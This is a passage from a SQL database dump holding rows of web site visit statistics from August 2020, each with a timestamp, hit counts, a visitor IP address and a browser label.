108.71.11','other'),(530261,1597046054,1,1,0,0,'66.249.76.112','chrome'),(530262,1597046065,1,1,0,0,'66.249.70.69','chrome'),(530263,1597046662,1,1,0,0,'66.249.70.70','chrome'),(530264,1597047024,1,1,0,0,'92.113.126.13','chrome'),(530265,1597047104,1,1,0,0,'66.249.64.36','chrome'),(530266,1597047231,2,2,0,0,'66.249.70.72','chrome'),(530267,1597047288,1,1,0,0,'173.212.233.72','firefox'),(530268,1597048467,1,1,0,0,'131.220.6.152','chrome'),(530269,1597048817,2,2,0,0,'66.249.70.70','chrome'),(530270,1597048872,1,1,0,0,'178.95.245.101','chrome'),(530271,1597049307,1,1,0,0,'8.29.198.26','other'),(530272,1597049395,3,3,0,0,'66.249.70.72','chrome'),(530273,1597049473,1,1,0,0,'66.249.64.33','chrome'),(530274,1597049947,1,1,0,0,'66.249.70.69','chrome'),(530275,1597050160,1,1,0,0,'5.45.207.174','other'),(530276,1597050166,1,1,0,0,'5.45.207.134','other'),(530277,1597050555,2,2,0,0,'66.249.70.72','chrome'),(530278,1597050608,1,1,0,0,'91.196.178.184','chrome'),(530279,1597050852,8,8,0,0,'109.108.71.11','other'),(530280,1597050867,1,1,0,0,'108.28.34.222','other'),(530281,1597051847,2,2,0,0,'66.249.70.72','chrome'),(530282,1597051857,1,1,0,0,'66.249.70.70','chrome'),(530283,1597051871,8,8,0,0,'109.108.71.11','other'),(530284,1597051972,1,1,0,0,'31.13.127.118','other'),(530285,1597053030,8,8,0,0,'109.108.71.11','other'),(530286,1597053160,1,1,0,0,'66.249.64.33','chrome'),(530287,1597053306,1,1,0,0,'5.45.207.174','other'),(530288,1597053310,1,1,0,0,'178.154.200.51','other'),(530289,1597053574,2,2,0,0,'66.249.70.70','chrome'),(530290,1597053590,1,1,0,0,'66.249.70.69','chrome'),(530291,1597053652,1,1,0,0,'3.85.241.105','chrome'),(530292,1597054337,8,8,0,0,'109.108.71.11','other'),(530293,1597054416,1,1,0,0,'66.249.70.72','chrome'),(530294,1597054492,1,1,0,0,'66.249.64.38','chrome'),(530295,1597055448,3,3,0,0,'66.249.70.69','chrome'),(530296,1597055459,1,1,0,0,'66.249.70.70','chrome'),(530297,1597055988,8,8,0,0,'109.108.71.11','other'),(530298,1597056459,4,4,0,0,'66.249.70.69','chrome'),(530299,1597056635,1,1,0,0,'178.154.200.36','other'),(530300,1597057706,1,1,0,0,'109.74.154.72','chrome'),(530301,1597057755,1,1,0,0,'178.154.200.36','other'),(530302,1597057794,1,1,0,0,'77.111.244.6','chrome'),(530303,1597057873,1,1,0,0,'66.249.64.33','chrome'),(530304,1597058019,1,1,0,0,'91.196.178.150','chrome'),(530305,1597058061,1,1,0,0,'66.249.70.72','chrome'),(530306,1597058083,1,1,0,0,'66.249.70.69','chrome'),(530307,1597058257,8,8,0,0,'109.108.71.11','other'),(530308,1597059253,1,1,0,0,'66.249.70.72','chrome'),(530309,1597059469,1,1,0,0,'66.249.70.69','chrome'),(530310,1597059761,1,1,0,0,'66.249.70.70','chrome'),(530311,1597059817,1,1,0,0,'91.196.178.72','chrome'),(530312,1597060130,1,1,0,0,'8.29.198.26','other'),(530313,1597060741,2,2,0,0,'66.249.70.70','chrome'),(530314,1597061414,1,1,0,0,'66.249.70.69','chrome'),(530315,1597062128,8,8,0,0,'109.108.71.11','other'),(530316,1597062464,1,1,0,0,'5.255.253.105','other'),(530317,1597062849,1,1,0,0,'66.249.70.72','chrome'),(530318,1597063591,1,1,0,0,'66.249.64.36','chrome'),(530319,1597063649,3,3,0,0,'94.45.128.92','chrome'),(530320,1597063792,1,1,0,0,'66.249.70.72','chrome'),(530321,1597064506,1,1,0,0,'207.46.13.167','other'),(530322,1597065185,1,1,0,0,'66.249.70.69','chrome'),(530323,1597066187,2,2,0,0,'54.213.138.195','chrome'),(530324,1597066372,1,1,0,0,'66.249.70.70','chrome'),(530325,1597067278,1,1,0,0,'91.196.177.46','chrome'),(530326,1597067876,1,1,0,0,'66.249.70.69','chrome'),(530327,1597067888,1,1,0,0,'188.191.233.57','chrome'),(530328,1597068031,1,1,0,0,'66.249.70.70','chrome'),(530329,1597068189,1,1,0,0,'66.249.70.72','chrome'),(530330,1597068410,1,1,0,0,'66.249.64.36','chrome'),(530331,1597068967,1,1,0,0,'91.196.178.72','chrome'),(530332,1597068974,6,6,0,0,'94.130.9.183','other'),(530333,1597069804,1,1,0,0,'66.249.70.70','chrome'),(530334,1597069814,1,1,0,0,'193.239.75.78','chrome'),(530335,1597070168,8,8,0,0,'109.108.71.11','other'),(530336,1597070292,2,2,0,0,'66.249.70.69','chrome'),(530337,1597070681,1,1,0,0,'91.196.177.46','chrome'),(530338,1597070958,1,1,0,0,'8.29.198.25','other'),(530339,1597071030,1,1,0,0,'17.58.99.7','other'),(530340,1597072098,8,8,0,0,'109.108.71.11','other'),(530341,1597072854,2,2,0,0,'66.249.70.70','chrome'),(530342,1597073279,8,8,0,0,'109.108.71.11','other'),(530343,1597073583,1,1,0,0,'5.45.207.174','other'),(530344,1597075840,1,1,0,0,'207.46.13.167','other'),(530345,1597076413,1,1,0,0,'178.154.200.51','other'),(530346,1597076433,8,8,0,0,'109.108.71.11','other'),(530347,1597077061,6,6,0,0,'66.249.70.70','chrome'),(530348,1597077086,2,2,0,0,'66.249.70.69','chrome'),(530349,1597077149,1,1,0,0,'207.46.13.167','other'),(530350,1597077219,2,2,0,0,'66.249.70.72','chrome'),(530351,1597077466,1,1,0,0,'185.183.107.90','chrome'),(530352,1597077543,1,1,0,0,'178.154.200.51','other'),(530353,1597077573,8,8,0,0,'109.108.71.11','other'),(530354,1597078003,4,4,0,0,'66.249.70.69','chrome'),(530355,1597078102,1,1,0,0,'207.46.13.167','other'),(530356,1597078167,2,2,0,0,'66.249.64.38','chrome'),(530357,1597078186,2,2,0,0,'66.249.64.33','chrome'),(530358,1597078478,1,1,0,0,'66.249.64.36','chrome'),(530359,1597078630,2,2,0,0,'66.249.70.72','chrome'),(530360,1597078633,1,1,0,0,'66.249.70.70','chrome'),(530361,1597078824,8,8,0,0,'109.108.71.11','other'),(530362,1597079565,1,1,0,0,'91.196.178.1','chrome'),(530363,1597079591,1,1,0,0,'207.46.13.167','other'),(530364,1597080184,1,0,1,0,'66.249.70.72',''),(530365,1597080211,2,1,1,0,'66.249.70.70',''),(530366,1597080319,8,8,0,0,'109.108.71.11','other'),(530367,1597080393,2,1,1,0,'66.249.70.69',''),(530368,1597080707,3,3,0,0,'66.249.70.72','chrome'),(530369,1597081252,1,1,0,0,'5.255.253.88','other'),(530370,1597081608,1,1,0,0,'66.249.64.33','chrome'),(530371,1597081728,1,1,0,0,'66.249.70.72','chrome'),(530372,1597081779,1,1,0,0,'8.29.198.26','other'),(530373,1597081826,1,1,0,0,'66.249.70.69','chrome'),(530374,1597082143,8,8,0,0,'109.108.71.11','other'),(530375,1597082393,4,4,0,0,'66.249.70.70','chrome'),(530376,1597082589,1,1,0,0,'91.196.178.91','firefox'),(530377,1597082687,1,1,0,0,'66.249.64.36','chrome'),(530378,1597082973,4,4,0,0,'66.249.70.72','chrome'),(530379,1597083490,1,1,0,0,'207.46.13.167','other'),(530380,1597083633,1,1,0,0,'178.154.200.69','other'),(530381,1597083663,1,1,0,0,'5.255.253.183','other'),(530382,1597084325,3,3,0,0,'66.249.70.72','chrome'),(530383,1597084482,1,1,0,0,'66.249.70.69','chrome'),(530384,1597084970,1,1,0,0,'88.99.2.203','other'),(530386,1597085008,1,1,0,0,'66.249.64.33','chrome'),(530387,1597085224,8,8,0,0,'109.108.71.11','other'),(530388,1597085640,3,3,0,0,'66.249.70.70','chrome'),(530389,1597085792,2,2,0,0,'66.249.70.69','chrome'),(530390,1597085909,2,2,0,0,'88.99.2.203','other'),(530391,1597086700,1,1,0,0,'66.249.64.33','chrome'),(530392,1597086950,1,1,0,0,'88.155.125.189','chrome'),(530393,1597087141,1,1,0,0,'88.99.2.203','other'),(530394,1597087302,2,2,0,0,'66.249.70.72','chrome'),(530395,1597087664,2,2,0,0,'66.249.70.70','chrome'),(530396,1597087678,2,2,0,0,'66.249.70.69','chrome'),(530397,1597088058,1,1,0,0,'88.99.2.203','other'),(530398,1597088891,1,1,0,0,'66.249.70.72','chrome'),(530399,1597089222,1,1,0,0,'88.99.2.203','other'),(530400,1597089571,1,1,0,0,'66.249.64.38','chrome'),(530401,1597089721,2,2,0,0,'66.249.70.70','chrome'),(530402,1597089759,1,1,0,0,'66.249.64.33','chrome'),(530403,1597089827,2,2,0,0,'66.249.70.72','chrome'),(530404,1597089852,8,8,0,0,'109.108.71.11','other'),(530405,1597090242,1,1,0,0,'88.99.2.203','other'),(530406,1597091251,1,1,0,0,'88.99.2.203','other'),(530407,1597091339,2,2,0,0,'66.249.70.69','chrome'),(530408,1597091359,1,1,0,0,'207.46.13.152','other'),(530409,1597091628,1,1,0,0,'66.249.64.38','chrome'),(530410,1597091680,1,1,0,0,'66.249.64.36','chrome'),(530411,1597091762,3,3,0,0,'66.249.70.70','chrome'),(530412,1597092225,1,1,0,0,'88.99.2.203','other'),(530413,1597092321,2,2,0,0,'95.213.141.126','opera'),(530414,1597092604,1,1,0,0,'8.29.198.25','other'),(530415,1597093010,3,3,0,0,'66.249.70.69','chrome'),(530416,1597093633,1,1,0,0,'66.249.70.72','chrome'),(530417,1597094541,1,1,0,0,'66.249.64.38','chrome'),(530418,1597094800,4,4,0,0,'66.249.70.69','chrome'),(530419,1597094941,2,2,0,0,'66.249.64.33','chrome'),(530420,1597095020,1,1,0,0,'207.46.13.152','other'),(530421,1597095511,1,1,0,0,'66.249.70.72','chrome'),(530422,1597096183,5,5,0,0,'66.249.70.69','chrome'),(530423,1597096570,2,2,0,0,'66.249.64.38','chrome'),(530424,1597096938,3,3,0,0,'66.249.70.70','chrome'),(530425,1597097008,1,1,0,0,'5.45.207.174','other'),(530426,1597097084,2,2,0,0,'66.249.70.69','chrome'),(530427,1597097243,8,8,0,0,'109.108.71.11','other'),(530428,1597097304,2,2,0,0,'66.249.70.72','chrome'),(530429,1597097795,2,2,0,0,'66.249.64.36','chrome'),(530430,1597097863,2,2,0,0,'66.249.64.38','chrome'),(530431,1597097994,5,5,0,0,'66.249.70.70','chrome'),(530432,1597098378,2,2,0,0,'66.249.70.69','chrome'),(530433,1597098517,5,5,0,0,'66.249.70.72','chrome'),(530434,1597099111,2,2,0,0,'66.249.70.70','chrome'),(530435,1597099383,2,2,0,0,'66.249.70.69','chrome'),(530436,1597100087,4,4,0,0,'66.249.70.72','chrome'),(530437,1597100177,1,1,0,0,'66.249.64.36','chrome'),(530438,1597100263,3,3,0,0,'66.249.70.70','chrome'),(530439,1597100783,2,2,0,0,'66.249.70.69','chrome'),(530440,1597101201,1,1,0,0,'178.154.200.51','other'),(530441,1597101495,2,2,0,0,'66.249.70.72','chrome'),(530442,1597102064,1,1,0,0,'66.249.64.38','chrome'),(530443,1597102459,2,2,0,0,'66.249.70.72','chrome'),(530444,1597102639,1,1,0,0,'66.249.64.36','chrome'),(530445,1597102644,1,1,0,0,'66.249.64.33','chrome'),(530446,1597103428,1,1,0,0,'8.29.198.26','other'),(530447,1597103708,1,1,0,0,'62.205.134.182','other'),(530448,1597104047,1,1,0,0,'76.217.31.195','chrome'),(530449,1597104257,6,6,0,0,'66.249.70.70','chrome'),(530450,1597104693,3,3,0,0,'66.249.70.72','chrome'),(530451,1597105519,1,1,0,0,'5.45.207.92','other'),(530452,1597105521,6,6,0,0,'66.249.70.70','chrome'),(530453,1597105524,1,1,0,0,'207.46.13.167','other'),(530454,1597105562,1,1,0,0,'66.249.64.36','chrome'),(530455,1597105718,8,8,0,0,'109.108.71.11','other'),(530456,1597105729,2,2,0,0,'66.249.70.72','chrome'),(530457,1597105799,5,5,0,0,'66.249.70.69','chrome'),(530458,1597106176,2,2,0,0,'66.249.64.33','chrome'),(530459,1597106584,2,2,0,0,'66.249.70.70','chrome'),(530460,1597106955,5,5,0,0,'66.249.70.69','chrome'),(530461,1597107091,8,8,0,0,'109.108.71.11','other'),(530462,1597107108,1,1,0,0,'158.69.116.77','other'),(530463,1597107138,1,1,0,0,'158.69.116.77','chrome'),(530464,1597107265,5,5,0,0,'66.249.70.72','chrome'),(530465,1597107331,1,1,0,0,'66.249.64.38','chrome'),(530466,1597107537,1,1,0,0,'5.255.253.183','other'),(530467,1597107690,1,1,0,0,'66.249.70.70','chrome'),(530468,1597108440,1,1,0,0,'66.249.70.69','chrome'),(530469,1597108642,8,8,0,0,'109.108.71.11','other'),(530470,1597108892,7,7,0,0,'66.249.70.70','chrome'),(530471,1597109341,4,4,0,0,'66.249.70.69','chrome'),(530472,1597109529,1,1,0,0,'66.249.70.72','chrome'),(530473,1597109897,1,1,0,0,'66.249.64.38','chrome'),(530474,1597109931,1,1,0,0,'5.255.253.88','other'),(530475,1597110025,1,1,0,0,'66.249.64.33','chrome'),(530476,1597110405,8,8,0,0,'109.108.71.11','other'),(530477,1597110565,3,3,0,0,'66.249.70.70','chrome'),(530478,1597110853,2,2,0,0,'66.249.64.38','chrome'),(530479,1597111020,7,7,0,0,'66.249.70.69','chrome'),(530480,1597111227,4,4,0,0,'66.249.70.72','chrome'),(530481,1597111848,1,1,0,0,'66.249.70.70','chrome'),(530482,1597112050,1,1,0,0,'66.249.64.36','chrome'),(530483,1597112088,2,2,0,0,'66.249.70.69','chrome'),(530484,1597112397,8,8,0,0,'109.108.71.11','other'),(530485,1597112897,3,3,0,0,'66.249.70.70','chrome'),(530486,1597113025,1,1,0,0,'51.91.219.193','other'),(530487,1597113118,1,1,0,0,'66.249.70.69','chrome'),(530488,1597114175,1,1,0,0,'66.249.64.38','chrome'),(530489,1597114249,1,1,0,0,'8.29.198.25','other'),(530490,1597114449,1,1,0,0,'66.249.70.72','chrome'),(530491,1597114567,3,3,0,0,'66.249.70.70','chrome'),(530492,1597114576,8,8,0,0,'109.108.71.11','other'),(530493,1597114978,1,1,0,0,'66.249.70.69','chrome'),(530494,1597115436,2,2,0,0,'66.249.70.72','chrome'),(530495,1597115518,1,1,0,0,'66.249.64.36','chrome'),(530496,1597116071,3,3,0,0,'66.249.70.69','chrome'),(530497,1597116347,1,1,0,0,'178.154.200.51','other'),(530498,1597116365,2,2,0,0,'66.249.70.72','chrome'),(530499,1597116395,1,1,0,0,'66.249.64.38','chrome'),(530500,1597116431,6,6,0,0,'66.249.70.70','chrome'),(530501,1597116599,2,2,0,0,'66.249.64.33','chrome'),(530502,1597117196,2,2,0,0,'66.249.70.69','chrome'),(530503,1597117572,8,8,0,0,'109.108.71.11','other'),(530504,1597117861,1,1,0,0,'66.249.64.38','chrome'),(530505,1597118287,3,3,0,0,'66.249.70.70','chrome'),(530506,1597118368,1,1,0,0,'66.249.70.72','chrome'),(530507,1597118660,2,2,0,0,'66.249.70.69','chrome'),(530508,1597119641,2,2,0,0,'66.249.70.69','chrome'),(530509,1597119668,1,1,0,0,'66.249.64.33','chrome'),(530510,1597119775,4,4,0,0,'66.249.70.72','chrome'),(530511,1597119848,2,2,0,0,'66.249.70.70','chrome'),(530512,1597120614,2,2,0,0,'66.249.64.33','chrome'),(530513,1597120804,1,1,0,0,'66.249.70.72','chrome'),(530514,1597121019,1,1,0,0,'66.249.70.69','chrome'),(530515,1597121229,2,2,0,0,'66.249.70.70','chrome'),(530516,1597121277,8,8,0,0,'109.108.71.11','other'),(530517,1597121717,1,1,0,0,'131.220.6.152','chrome'),(530518,1597121846,1,1,0,0,'62.205.134.182','other'),(530519,1597121957,3,3,0,0,'66.249.70.72','chrome'),(530520,1597121981,1,1,0,0,'66.249.64.38','chrome'),(530521,1597122453,8,8,0,0,'109.108.71.11','other'),(530522,1597122804,1,1,0,0,'66.249.70.69','chrome'),(530523,1597123360,3,3,0,0,'66.249.70.72','chrome'),(530524,1597123598,6,6,0,0,'66.249.70.70','chrome'),(530525,1597123698,8,8,0,0,'109.108.71.11','other'),(530526,1597123793,1,1,0,0,'66.249.64.38','chrome'),(530527,1597124077,1,1,0,0,'66.249.64.36','chrome'),(530528,1597124426,3,3,0,0,'66.249.70.69','chrome'),(530529,1597124601,1,1,0,0,'196.196.216.139','chrome'),(530530,1597124979,2,2,0,0,'66.249.70.70','chrome'),(530531,1597125014,1,1,0,0,'66.249.70.72','chrome'),(530532,1597125055,1,1,0,0,'5.45.207.92','other'),(530533,1597125068,1,1,0,0,'8.29.198.27','other'),(530534,1597125119,8,8,0,0,'109.108.71.11','other'),(530535,1597125664,1,1,0,0,'91.196.178.79','chrome'),(530536,1597125726,1,1,0,0,'77.111.244.6','chrome'),(530537,1597125804,3,3,0,0,'66.249.70.69','chrome'),(530538,1597126065,1,1,0,0,'212.1.124.210','chrome'),(530539,1597126575,1,1,0,0,'66.249.64.36','chrome'),(530540,1597126758,1,1,0,0,'91.209.11.236','other'),(530541,1597126846,1,1,0,0,'91.196.178.72','chrome'),(530542,1597126991,8,8,0,0,'109.108.71.11','other'),(530543,1597127198,1,1,0,0,'91.196.178.74','firefox'),(530544,1597127250,2,2,0,0,'178.154.200.51','other'),(530545,1597127671,1,0,1,0,'66.249.70.70',''),(530546,1597127993,1,1,0,0,'66.249.70.70','chrome'),(530547,1597128346,1,1,0,0,'5.255.253.69','other'),(530548,1597128641,1,1,0,0,'91.196.178.72','chrome'),(530549,1597129437,1,1,0,0,'91.196.177.228','chrome'),(530550,1597129472,8,8,0,0,'109.108.71.11','other'),(530551,1597130394,3,3,0,0,'66.249.70.72','chrome'),(530552,1597130500,2,2,0,0,'66.249.70.70','chrome'),(530553,1597130726,1,1,0,0,'91.196.121.135','chrome'),(530554,1597131095,1,1,0,0,'66.249.64.38','chrome'),(530555,1597131578,3,3,0,0,'66.249.70.69','chrome'),(530556,1597131621,1,1,0,0,'66.249.70.70','chrome'),(530557,1597131877,1,1,0,0,'35.238.212.64','firefox'),(530558,1597131958,1,1,0,0,'159.224.255.154','chrome'),(530559,1597132286,1,1,0,0,'66.249.64.33','chrome'),(530560,1597133110,8,8,0,0,'109.108.71.11','other'),(530561,1597134115,1,1,0,0,'66.249.64.36','chrome'),(530562,1597134262,2,2,0,0,'66.249.70.72','chrome'),(530563,1597134297,1,1,0,0,'66.249.70.70','chrome'),(530564,1597134340,3,3,0,0,'66.249.70.69','chrome'),(530565,1597134698,2,2,0,0,'66.249.64.38','chrome'),(530566,1597135019,1,1,0,0,'91.196.177.46','chrome'),(530567,1597135381,2,2,0,0,'66.249.70.69','chrome'),(530568,1597135716,4,4,0,0,'66.249.70.70','chrome'),(530569,1597135892,1,1,0,0,'8.29.198.26','other'),(530570,1597136329,1,1,0,0,'207.46.13.231','other'),(530571,1597136844,2,2,0,0,'66.249.70.70','chrome'),(530572,1597136874,2,2,0,0,'66.249.70.69','chrome'),(530573,1597137228,2,2,0,0,'66.249.70.72','chrome'),(530574,1597137463,1,1,0,0,'207.46.13.152','other'),(530575,1597137547,1,1,0,0,'66.249.64.38','chrome'),(530576,1597137923,1,1,0,0,'46.200.150.70','chrome'),(530577,1597137961,2,2,0,0,'66.249.70.69','chrome'),(530578,1597138100,1,1,0,0,'207.46.13.231','other'),(530579,1597138181,4,4,0,0,'66.249.70.72','chrome'),(530580,1597138988,2,2,0,0,'66.249.70.69','chrome'),(530581,1597139165,3,3,0,0,'66.249.70.70','chrome'),(530582,1597139258,2,2,0,0,'66.249.70.72','chrome'),(530583,1597139689,1,1,0,0,'66.249.64.33','chrome'),(530584,1597139797,1,1,0,0,'66.249.64.38','chrome'),(530585,1597139970,1,1,0,0,'91.196.177.46','chrome'),(530586,1597140108,1,1,0,0,'66.249.70.70','chrome'),(530587,1597140231,4,4,0,0,'66.249.70.69','chrome'),(530588,1597140389,1,1,0,0,'66.249.70.72','chrome'),(530589,1597140590,2,2,0,0,'66.249.64.33','chrome'),(530590,1597140698,1,1,0,0,'3.236.113.94','chrome'),(530591,1597140922,8,8,0,0,'109.108.71.11','other'),(530592,1597141331,1,1,0,0,'66.249.70.72','chrome'),(530593,1597141369,4,4,0,0,'66.249.70.70','chrome'),(530594,1597142075,3,3,0,0,'66.249.70.69','chrome'),(530595,1597142344,1,1,0,0,'66.249.70.72','chrome'),(530596,1597142498,1,1,0,0,'84.17.55.110','firefox'),(530597,1597142658,4,4,0,0,'66.249.70.70','chrome'),(530598,1597142990,1,1,0,0,'66.249.70.69','chrome'),(530599,1597143208,1,1,0,0,'66.249.64.38','chrome'),(530600,1597143356,1,1,0,0,'178.95.245.101','chrome'),(530601,1597143584,2,2,0,0,'66.249.64.33','chrome'),(530602,1597143598,1,1,0,0,'66.249.64.36','chrome'),(530603,1597143639,3,3,0,0,'66.249.70.70','chrome'),(530604,1597143878,1,1,0,0,'109.74.154.72','chrome'),(530605,1597144301,1,1,0,0,'66.249.64.38','chrome'),(530606,1597144320,2,2,0,0,'66.249.70.72','chrome'),(530607,1597144520,1,1,0,0,'92.113.128.74','chrome'),(530608,1597144928,2,2,0,0,'66.249.64.36','chrome'),(530609,1597144976,2,2,0,0,'195.154.242.189','chrome'),(530610,1597145012,6,6,0,0,'66.249.70.69','chrome'),(530611,1597145216,4,3,1,0,'66.249.70.70',''),(530612,1597145290,3,3,0,0,'66.249.70.72','chrome'),(530613,1597145358,2,2,0,0,'66.249.64.33','chrome'),(530614,1597145966,1,1,0,0,'66.249.64.38','chrome'),(530615,1597146090,1,1,0,0,'134.249.124.67','chrome'),(530616,1597146262,1,1,0,0,'91.196.177.46','chrome'),(530617,1597146374,1,1,0,0,'66.249.64.36','chrome'),(530618,1597146723,1,1,0,0,'8.29.198.26','other'),(530619,1597146745,3,3,0,0,'66.249.70.70','chrome'),(530620,1597146915,1,1,0,0,'31.13.127.7','other'),(530621,1597147159,4,4,0,0,'66.249.70.69','chrome'),(530622,1597147595,2,2,0,0,'66.249.70.72','chrome'),(530623,1597147909,1,1,0,0,'66.249.70.70','chrome'),(530624,1597147979,1,1,0,0,'207.46.13.225','other'),(530625,1597148203,1,1,0,0,'178.154.200.120','other'),(530626,1597148457,2,2,0,0,'207.46.13.231','other'),(530627,1597148497,3,3,0,0,'66.249.70.69','chrome'),(530628,1597148518,1,1,0,0,'134.249.124.67','chrome'),(530629,1597148756,1,1,0,0,'66.249.64.36','chrome'),(530630,1597148816,3,3,0,0,'66.249.70.70','chrome'),(530631,1597149382,1,1,0,0,'66.249.64.38','chrome'),(530632,1597149505,1,1,0,0,'66.249.70.69','chrome'),(530633,1597149705,1,1,0,0,'91.196.178.98','chrome'),(530634,1597150111,1,1,0,0,'5.45.207.75','other'),(530635,1597150396,2,2,0,0,'66.249.70.70','chrome'),(530636,1597150595,2,2,0,0,'66.249.70.69','chrome'),(530637,1597150890,3,3,0,0,'94.153.65.66','chrome'),(530638,1597151161,1,1,0,0,'194.44.105.253','chrome'),(530639,1597151197,1,1,0,0,'66.249.64.36','chrome'),(530640,1597151246,1,1,0,0,'66.249.70.72','chrome'),(530641,1597151330,1,1,0,0,'66.249.70.70','chrome'),(530642,1597151589,1,1,0,0,'178.92.73.224','chrome'),(530643,1597152616,1,1,0,0,'66.249.70.70','chrome'),(530644,1597153025,1,1,0,0,'66.249.64.36','chrome'),(530645,1597153172,2,2,0,0,'66.249.70.72','chrome'),(530646,1597153395,1,1,0,0,'66.249.64.38','chrome'),(530647,1597153909,1,1,0,0,'37.73.208.30','chrome'),(530648,1597153948,8,8,0,0,'109.108.71.11','other'),(530649,1597154041,2,2,0,0,'66.249.64.33','chrome'),(530650,1597154066,2,2,0,0,'66.249.70.69','chrome'),(530651,1597154203,1,1,0,0,'77.111.244.42','chrome'),(530652,1597154733,1,1,0,0,'66.249.70.70','chrome'),(530653,1597154957,1,1,0,0,'66.249.64.38','chrome'),(530654,1597155077,8,8,0,0,'109.108.71.11','other'),(530655,1597155747,2,2,0,0,'66.249.70.72','chrome'),(530656,1597156280,8,8,0,0,'109.108.71.11','other'),(530657,1597157055,1,1,0,0,'66.249.64.38','chrome'),(530658,1597157210,1,1,0,0,'66.249.70.72','chrome'),(530659,1597157547,1,1,0,0,'8.29.198.26','other'),(530660,1597157706,1,1,0,0,'66.249.64.36','chrome'),(530661,1597157768,8,8,0,0,'109.108.71.11','other'),(530662,1597157839,2,2,0,0,'66.249.70.70','chrome'),(530663,1597157877,6,6,0,0,'66.249.70.69','chrome'),(530664,1597158283,1,1,0,0,'66.249.70.72','chrome'),(530665,1597159326,1,1,0,0,'66.249.70.69','chrome'),(530666,1597159360,1,1,0,0,'91.196.178.1','chrome'),(530667,1597159806,8,8,0,0,'109.108.71.11','other'),(530668,1597159816,1,1,0,0,'77.111.247.52','chrome'),(530669,1597160607,1,1,0,0,'91.196.178.69','firefox'),(530670,1597163415,8,8,0,0,'109.108.71.11','other'),(530671,1597165215,9,9,0,0,'66.249.70.69','chrome'),(530672,1597165416,1,1,0,0,'5.45.207.174','other'),(530673,1597165446,1,1,0,0,'66.249.64.33','chrome'),(530674,1597165722,29,29,0,0,'35.238.212.64','chrome'),(530675,1597165759,2,2,0,0,'66.249.70.70','chrome'),(530676,1597165838,2,2,0,0,'66.249.64.38','chrome'),(530677,1597166416,2,2,0,0,'66.249.70.72','chrome'),(530678,1597166555,7,7,0,0,'66.249.70.69','chrome'),(530679,1597166946,5,5,0,0,'66.249.70.70','chrome'),(530680,1597167571,1,1,0,0,'66.249.64.33','chrome'),(530681,1597167778,3,3,0,0,'66.249.70.69','chrome'),(530682,1597168236,1,0,1,0,'66.249.70.70',''),(530683,1597168365,1,1,0,0,'8.29.198.26','other'),(530684,1597168375,2,2,0,0,'66.249.70.72','chrome'),(530685,1597168405,6,6,0,0,'66.249.70.70','chrome'),(530686,1597168454,8,8,0,0,'109.108.71.11','other'),(530687,1597168518,1,1,0,0,'46.211.13.116','chrome'),(530688,1597169048,1,1,0,0,'66.249.64.33','chrome'),(530689,1597169658,4,4,0,0,'66.249.70.70','chrome'),(530690,1597169690,8,8,0,0,'109.108.71.11','other'),(530691,1597169792,1,1,0,0,'66.249.70.69','chrome'),(530692,1597169855,1,1,0,0,'66.249.70.72','chrome'),(530693,1597170021,1,1,0,0,'178.154.200.120','other'),(530694,1597170077,1,1,0,0,'173.252.95.6','other'),(530695,1597170078,1,1,0,0,'173.252.95.21','other'),(530696,1597170690,1,1,0,0,'207.46.13.152','other'),(530697,1597170748,2,2,0,0,'66.249.70.70','chrome'),(530698,1597170754,1,1,0,0,'91.196.178.171','chrome'),(530699,1597171108,3,3,0,0,'66.249.70.72','chrome'),(530700,1597171184,8,8,0,0,'109.108.71.11','other'),(530701,1597171249,1,1,0,0,'157.55.39.83','other'),(530702,1597171854,2,2,0,0,'66.249.70.70','chrome'),(530703,1597172009,3,3,0,0,'66.249.70.69','chrome'),(530704,1597172772,1,1,0,0,'66.249.64.36','chrome'),(530705,1597172780,2,2,0,0,'66.249.70.70','chrome'),(530706,1597172912,8,8,0,0,'109.108.71.11','other'),(530707,1597173744,1,1,0,0,'178.154.200.19','other'),(530708,1597173854,3,3,0,0,'66.249.70.72','chrome'),(530709,1597174224,1,1,0,0,'66.249.64.36','chrome'),(530710,1597174233,1,1,0,0,'66.249.64.33','chrome'),(530711,1597174464,1,1,0,0,'66.249.64.38','chrome'),(530712,1597174747,1,1,0,0,'88.155.128.236','chrome'),(530713,1597174959,1,1,0,0,'66.249.70.70','chrome'),(530714,1597175684,8,8,0,0,'109.108.71.11','other'),(530715,1597176336,2,2,0,0,'66.249.70.69','chrome'),(530716,1597176431,1,1,0,0,'66.249.70.70','chrome'),(530717,1597176671,2,2,0,0,'66.249.64.38','chrome'),(530718,1597176682,1,1,0,0,'66.249.64.33','chrome'),(530719,1597177728,1,1,0,0,'66.249.64.36','chrome'),(530720,1597177885,1,1,0,0,'207.46.13.231','other'),(530721,1597178338,3,3,0,0,'66.249.70.72','chrome'),(530722,1597178426,3,3,0,0,'66.249.70.69','chrome'),(530723,1597178741,2,2,0,0,'66.249.70.70','chrome'),(530724,1597179191,1,1,0,0,'8.29.198.25','other'),(530725,1597180129,1,1,0,0,'66.249.64.33','chrome'),(530726,1597180200,2,2,0,0,'66.249.70.72','chrome'),(530727,1597180444,2,2,0,0,'66.249.70.69','chrome'),(530728,1597180812,8,8,0,0,'109.108.71.11','other'),(530729,1597180851,2,2,0,0,'91.196.178.140','chrome'),(530730,1597180924,1,1,0,0,'66.249.70.70','chrome'),(530731,1597181145,2,2,0,0,'66.249.70.72','chrome'),(530732,1597181630,2,2,0,0,'66.249.70.69','chrome'),(530733,1597182060,8,8,0,0,'109.108.71.11','other'),(530734,1597182257,3,3,0,0,'66.249.70.70','chrome'),(530735,1597182592,2,2,0,0,'66.249.70.69','chrome'),(530736,1597182720,2,2,0,0,'66.249.70.72','chrome'),(530737,1597182858,1,1,0,0,'207.46.13.188','other'),(530738,1597183297,8,8,0,0,'109.108.71.11','other'),(530739,1597183881,1,1,0,0,'66.249.70.72','chrome'),(530740,1597184172,1,1,0,0,'66.249.70.69','chrome'),(530741,1597184502,8,8,0,0,'109.108.71.11','other'),(530742,1597184942,3,3,0,0,'66.249.70.70','chrome'),(530743,1597185446,3,3,0,0,'66.249.70.69','chrome'),(530744,1597185506,1,1,0,0,'66.249.70.72','chrome'),(530745,1597185636,8,8,0,0,'109.108.71.11','other'),(530746,1597186367,1,1,0,0,'66.249.64.38','chrome'),(530747,1597186470,1,1,0,0,'66.249.64.36','chrome'),(530748,1597186481,1,1,0,0,'66.249.70.69','chrome'),(530749,1597186631,1,1,0,0,'66.249.70.70','chrome'),(530750,1597186665,1,1,0,0,'157.55.39.138','other'),(530751,1597186785,8,8,0,0,'109.108.71.11','other'),(530752,1597186889,1,1,0,0,'93.159.230.28','chrome'),(530753,1597187293,3,3,0,0,'66.249.70.72','chrome'),(530754,1597187368,1,1,0,0